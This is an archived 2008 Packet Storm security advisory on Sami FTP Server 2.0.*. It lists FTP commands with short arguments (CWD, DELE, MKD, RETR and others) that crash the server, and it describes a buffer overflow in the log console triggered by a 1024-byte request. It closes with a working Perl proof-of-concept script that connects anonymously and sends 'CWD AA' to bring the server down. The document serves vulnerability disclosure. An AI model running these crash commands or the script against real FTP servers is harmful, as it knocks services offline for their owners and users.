samiftp-multi.txt

2008-02-15T00:00:00
ID PACKETSTORM:63683
Type packetstorm
Reporter securfrog
Modified 2008-02-15T00:00:00

Description

                                        
                                            `###################################################################################################################  
# Sami FTP Server 2.0.* Multiple Remote Vulnerabilities  
#  
# Bugs :  
#  
# 1)Multiples remote denial of service  
(CWD,DELE,MKD,RMD,RETR,RNFR,RNTO,SIZE,STOR)  
#  
# 2)Remote Buffer overflow (Logs)  
#  
# Remote Denial of service:  
# APPE A => server gone  
#  
# CWD AA => server gone  
#  
# DELE AA ==> server gone  
#  
# MKD AA ==> server gone  
#  
# RMD AA ==> server gone  
#  
# RETR AA ==> server gone  
#  
# RNFR AA ==> server gone  
#  
# RNTO AA ==> server gone  
#  
# SIZE AA ==> server gone  
#  
# STOR AA ==> server gone  
#  
#  
# Buffer Overflow :  
# In the console management,you can view your logs,and set some stuff,when  
you open the console management a  
#  
# buffer overflow occurs ,if you have send previously a request(no matter  
the command) with 1024 bytes to the server.  
#  
# Also explorer.exe crash at the same time, 2 in 1 ;] The file is called(  
SamyFtp.binlog)note that this bug is  
#  
# quite critical , because it will occurs all the time,when you open the  
console management,and you dont need to be loggued  
#  
# you can simply send a username with 1024 bytes ...  
#  
#  
# @nolife: Life is always better when you dont know. things are clearer also  
smile  
#  
#  
#  
# Denial of service Poc  
#  
#  
  
use Net::FTP;  
  
(($target = $ARGV[0])) || die "usage:$0 <target> <port>";  
  
my $user = "anonymous";  
  
my $pass = "something";  
  
print "Trying to connect to :$target...\n";  
  
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not  
connect";  
  
print "Connected!\n";  
  
$ftp->login($user, $pass);  
  
$ftp->cwd("AA");  
  
print "Poc Successfull the server should down now \n";  
  
$ftp->quit;  
`